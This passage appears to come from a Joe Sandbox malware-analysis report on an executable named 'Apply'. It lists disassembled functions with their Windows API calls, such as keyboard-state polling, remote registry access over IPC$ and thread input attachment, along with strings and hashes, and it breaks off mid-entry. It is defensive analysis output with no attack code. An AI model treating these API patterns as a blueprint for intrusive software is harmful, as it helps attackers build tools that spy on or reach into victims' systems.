close PlayMe, xrefs: 008BF0AF, 008BF0DC
play PlayMe, xrefs: 008BF0E3

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 053db689a5fb19100c0827b409283483c71dbcd980aa597d0eb87343d887dd03
Instruction ID: 023ac3a5662aa0080f03200c14ac514bf74644e489f3b00ac98ffe18e8de43b9
Opcode Fuzzy Hash: 053db689a5fb19100c0827b409283483c71dbcd980aa597d0eb87343d887dd03
Instruction Fuzzy Hash: FA119431A9015E79D720B2A59C49EFFAB7CFBD1B14F000465B911E20D2DE601D49C9A1

Function 008BA692 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 008BA713
SetKeyboardState.USER32(?), ref: 008BA77E
GetAsyncKeyState.USER32(000000A0), ref: 008BA79E
GetKeyState.USER32(000000A0), ref: 008BA7B5
GetAsyncKeyState.USER32(000000A1), ref: 008BA7E4
GetKeyState.USER32(000000A1), ref: 008BA7F5
GetAsyncKeyState.USER32(00000011), ref: 008BA821
GetKeyState.USER32(00000011), ref: 008BA82F
GetAsyncKeyState.USER32(00000012), ref: 008BA858
GetKeyState.USER32(00000012), ref: 008BA866
GetAsyncKeyState.USER32(0000005B), ref: 008BA88F
GetKeyState.USER32(0000005B), ref: 008BA89D

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f49fcbb860dc9e75396023f4b69b353ed21a2e04273c0c1c362bab7eb5497e94
Instruction ID: f4674e4b97776c0707c2a44f34ac16a581b0187b9added4dcdc7e4b6c8628552
Opcode Fuzzy Hash: f49fcbb860dc9e75396023f4b69b353ed21a2e04273c0c1c362bab7eb5497e94
Instruction Fuzzy Hash: D851DC609047C829FB39DB6488557EABFB4FF12380F0845A9C5C29A7C2DA54DE4CCB63

Function 008B63BF Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 008B63DB
GetWindowRect.USER32(00000000,?), ref: 008B63F4
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 008B6452
GetDlgItem.USER32(?,00000002), ref: 008B6462
GetWindowRect.USER32(00000000,?), ref: 008B6474
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 008B64C8
GetDlgItem.USER32(?,000003E9), ref: 008B64D6
GetWindowRect.USER32(00000000,?), ref: 008B64E8
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 008B652A
GetDlgItem.USER32(?,000003EA), ref: 008B653D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008B6553
InvalidateRect.USER32(?,00000000,00000001), ref: 008B6560

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 7a63adaa1f6a1adc58f753dcaa61cf3912ab81274bc9f51d12609afc4cb8c3c4
Instruction ID: 135cbe9ac93af6ffcceb44398fa3c46d340e509cfec1b1e57f465a63df3e0a5e
Opcode Fuzzy Hash: 7a63adaa1f6a1adc58f753dcaa61cf3912ab81274bc9f51d12609afc4cb8c3c4
Instruction Fuzzy Hash: CE510071A00705AFDF18CF68DD85AAEBBB5FB48310F108129F519E7294E774AD54CB50

Function 00868EF2 Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00869287: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00868F0D,?,00000000,?,?,?,?,00868EDF,00000000,?), ref: 008692EA

DestroyWindow.USER32(?), ref: 00868FA6
KillTimer.USER32(00000000,?,?,?,?,00868EDF,00000000,?), ref: 00869040
DestroyAcceleratorTable.USER32(00000000), ref: 008A7019
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00868EDF,00000000,?), ref: 008A7047
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00868EDF,00000000,?), ref: 008A705E
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00868EDF,00000000), ref: 008A707A
DeleteObject.GDI32(00000000), ref: 008A708C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 4b4e2e5952f409961dc6b4a8a2b11624f2dd9c813ec0d71b08589a5ddf74764f
Instruction ID: aae464118e2b81ac83bc145bf4cf4e0a1479661ba6ec4ca50c257f1104d161fe
Opcode Fuzzy Hash: 4b4e2e5952f409961dc6b4a8a2b11624f2dd9c813ec0d71b08589a5ddf74764f
Instruction Fuzzy Hash: 8F61BF31519B01EFEB359F14DE48B2977F2FB41316F154618E086CAAA0CB71A886EF81

Function 008B0D65 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008B0E29
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008B0E45
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008B0E61
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008B0E8B
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 008B0EB3
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008B0EBE
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008B0EC3

Strings

SOFTWARE\Classes\, xrefs: 008B0D95
\CLSID, xrefs: 008B0DAB
\IPC$, xrefs: 008B0E0B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 7e20205f6a9545b05bb95afa5684ef343729d81e2d1e044d6c50218ea75d554c
Instruction ID: 83df025756880c1c66414c0cfb9b8660aa2064b8b5efd22aaeec30abdd60dabe
Opcode Fuzzy Hash: 7e20205f6a9545b05bb95afa5684ef343729d81e2d1e044d6c50218ea75d554c
Instruction Fuzzy Hash: 12410972D1022DABCF15EBA4DC958EEB778FF14311F44456AE805E7261EB309E09CB91

Function 008E4756 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008E47FB
CreateCompatibleDC.GDI32(00000000), ref: 008E4802
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008E4815
SelectObject.GDI32(00000000,00000000), ref: 008E481D
GetPixel.GDI32(00000000,00000000,00000000), ref: 008E4828
DeleteDC.GDI32(00000000), ref: 008E4832
GetWindowLongW.USER32(?,000000EC), ref: 008E483C
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 008E4852
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 008E485E

Strings

static, xrefs: 008E4793

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: b2755fe23109bea0f2d45fdede9b723aca6fb1fba7544e923e2a5716d50d0c8e
Instruction ID: 5b0deba5ed550623fcf88f92e7e52ad4ce6765726d8db876ab9a20aec58966ac
Opcode Fuzzy Hash: b2755fe23109bea0f2d45fdede9b723aca6fb1fba7544e923e2a5716d50d0c8e
Instruction Fuzzy Hash: DA316031100299AFDF119F65DC48FDA3BA9FF0A724F110225FA28EA1A0C775D855DB94

Function 008C8205 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 008C8262
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008C82FE
SHGetDesktopFolder.SHELL32(?), ref: 008C8312
CoCreateInstance.OLE32(008F0CF0,00000000,00000001,00917E7C,?), ref: 008C835E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008C83E3
CoTaskMemFree.OLE32(?,?), ref: 008C843B
SHBrowseForFolderW.SHELL32(?), ref: 008C84C6
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008C84E9
CoTaskMemFree.OLE32(00000000), ref: 008C84F0
CoTaskMemFree.OLE32(00000000), ref: 008C8545
CoUninitialize.OLE32 ref: 008C854B

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: ddcd0b612c45c3750dd732450858ad13cfb7b2de675b107b6e53b7d528ea1b02
Instruction ID: 6526e40259ea723b209efc317faa225d3eef96237e2e68689fb5f896fd030e43
Opcode Fuzzy Hash: ddcd0b612c45c3750dd732450858ad13cfb7b2de675b107b6e53b7d528ea1b02
Instruction Fuzzy Hash: A0C1FB75A00219EFCB14DFA4C884EAEBBB5FF48344B1484A9E915DB361DB30EE45CB91

Function 008B010F Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008B0136
SafeArrayAllocData.OLEAUT32(?), ref: 008B018F
VariantInit.OLEAUT32(?), ref: 008B01A1
SafeArrayAccessData.OLEAUT32(?,?), ref: 008B01C1
VariantCopy.OLEAUT32(?,?), ref: 008B0214
SafeArrayUnaccessData.OLEAUT32(?), ref: 008B0228
VariantClear.OLEAUT32(?), ref: 008B023D
SafeArrayDestroyData.OLEAUT32(?), ref: 008B024A
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008B0253
VariantClear.OLEAUT32(?), ref: 008B0265
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008B0270

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 658f4b9595f057615f22c024c99a3c31e22cb8db175782d72ca255b8151d29a3
Instruction ID: 4f0be91026069e77a069e9c006cd932fa5b9003799639b099587191e1c757362
Opcode Fuzzy Hash: 658f4b9595f057615f22c024c99a3c31e22cb8db175782d72ca255b8151d29a3
Instruction Fuzzy Hash: B1414F75A002199FCF05DF68D8889EE7BB9FF58344F008025E915EB361D730A949CF91

Function 008D945A Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 008D947A

Part of subcall function 008B954D: _wcslen.LIBCMT ref: 008B9570

_wcslen.LIBCMT ref: 008D94D5
_wcslen.LIBCMT ref: 008D9523
_wcslen.LIBCMT ref: 008D9563
_wcslen.LIBCMT ref: 008D95F5

Strings

winapi, xrefs: 008D951D, 008D9522
stdcall, xrefs: 008D955D, 008D9562
cdecl, xrefs: 008D94CF, 008D94D4
none, xrefs: 008D95EC, 008D95F1

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 281d6b497d270fc9c5b8eb76e8f167d93276de234c13fa1162d0387ae193e3b3
Instruction ID: cd6f3d884ad1b70155d6de2c2eb7360fe1c9fa57ada45c2cdade3109b62cd991
Opcode Fuzzy Hash: 281d6b497d270fc9c5b8eb76e8f167d93276de234c13fa1162d0387ae193e3b3
Instruction Fuzzy Hash: CB51B131A045169BCB15DFACD9908BDB3B5FF64324B60432AE8AAE7384DB31DE41C790

Function 008C8904 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 008C89C6
SystemTimeToFileTime.KERNEL32(?,?), ref: 008C89D6
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008C89E2
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C8A7F
SetCurrentDirectoryW.KERNEL32(?), ref: 008C8A93
SetCurrentDirectoryW.KERNEL32(?), ref: 008C8AC5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008C8AFB
SetCurrentDirectoryW.KERNEL32(?), ref: 008C8B04

Strings

*.*, xrefs: 008C8B0A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 09c59330d348bd9bb5b24fb9652aa12fe40ab6befb48162edb7727e5e5c0effc
Instruction ID: d9ef6061a5fa61d99157e2c729c3e94cd67b2c96c796b5976ed7cadb3a72cf06
Opcode Fuzzy Hash: 09c59330d348bd9bb5b24fb9652aa12fe40ab6befb48162edb7727e5e5c0effc
Instruction Fuzzy Hash: 64612A725043059FCB10EF64C885EAEB7E8FF89314F04891EE999D7251EB31E949CB92

Function 008E4404 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 008E4437
SetMenu.USER32(?,00000000), ref: 008E4446
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E44CE
IsMenu.USER32(?), ref: 008E44E2
CreatePopupMenu.USER32 ref: 008E44EC
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008E4519
DrawMenuBar.USER32 ref: 008E4521

Strings

0, xrefs: 008E4412
F, xrefs: 008E450C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: c0a11d16a4caa9c8b97e1ce376cf8c72a5e3f7b9a1048bc463042e5591040f8a
Instruction ID: 98e83b5d8f1fe45a80c5497a8d0f61829cd7e4e738d2ff68bf28ecb81b9ae8d0
Opcode Fuzzy Hash: c0a11d16a4caa9c8b97e1ce376cf8c72a5e3f7b9a1048bc463042e5591040f8a
Instruction Fuzzy Hash: 5A413579A01349EFDF24CF65E884AAA7BB5FF4A314F140029F959AB3A0D731A914CB50

Function 008B25C1 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 008B2646
GetDlgCtrlID.USER32 ref: 008B2651
GetParent.USER32 ref: 008B266D
SendMessageW.USER32(00000000,?,00000111,?), ref: 008B2670
GetDlgCtrlID.USER32(?), ref: 008B2679
GetParent.USER32(?), ref: 008B268D
SendMessageW.USER32(00000000,?,00000111,?), ref: 008B2690

Strings

ComboBox, xrefs: 008B25CE
ListBox, xrefs: 008B2603

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: f9f01020bb9c6e2e0aa4a5e64b575b5b4b28656460d00e98f5cced658d337742
Instruction ID: 2da3db3f7727dea9ddc8daed6a32a592780d17de544f90a5f1cf256afa1bac80
Opcode Fuzzy Hash: f9f01020bb9c6e2e0aa4a5e64b575b5b4b28656460d00e98f5cced658d337742
Instruction Fuzzy Hash: 8121C274E40218BBCF04ABA4CCC5EEEBBB4FF19310F004556B952DB2A2DA795809DB61

Function 008B26A2 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 008B2725
GetDlgCtrlID.USER32 ref: 008B2730
GetParent.USER32 ref: 008B274C
SendMessageW.USER32(00000000,?,00000111,?), ref: 008B274F
GetDlgCtrlID.USER32(?), ref: 008B2758
GetParent.USER32(?), ref: 008B276C
SendMessageW.USER32(00000000,?,00000111,?), ref: 008B276F

Strings

ComboBox, xrefs: 008B26AF
ListBox, xrefs: 008B26E4

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 15682f2c18b809818b89d8d8bf0b7a0e9ad3f79c756a6622b75d6636590e62af
Instruction ID: e39b16ccd8e90b7098ecee53e56486bd0ee4eeaf1a7c01fefa708141550b0efc
Opcode Fuzzy Hash: 15682f2c18b809818b89d8d8bf0b7a0e9ad3f79c756a6622b75d6636590e62af
Instruction Fuzzy Hash: 0221C274901218BBCF04ABA4CCC5EEEBBB8FF04300F004546B951DB2A2DA395849DB65

Function 008E41E1 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008E425B
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008E425E
GetWindowLongW.USER32(?,000000F0), ref: 008E4285
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008E42A8
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008E4320
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 008E436A
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 008E4385
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 008E43A0
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 008E43B4
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 008E43D1

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: f15e4dd2b13aef8a8e68d6f952e7c26061bf0b2fb908f46ce565c6fa67ca8a16
Instruction ID: 3d7a830b5957d5aa4419e95defad461dda8e09c1064a31ab4ec05dd0cb6b7b13
Opcode Fuzzy Hash: f15e4dd2b13aef8a8e68d6f952e7c26061bf0b2fb908f46ce565c6fa67ca8a16
Instruction Fuzzy Hash: 7B614775900248AFDB21DFA8CC81EEE77B8FB0A714F10015AFA19EB3A1C770A945DB50

Function 008BB830 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 008BB852
GetForegroundWindow.USER32(00000000,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB866
GetWindowThreadProcessId.USER32(00000000), ref: 008BB86D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB87C
GetWindowThreadProcessId.USER32(?,00000000), ref: 008BB88E
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB8A7
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB8B9
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB8FE
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB913
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,008BA8E2,?,00000001), ref: 008BB91E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

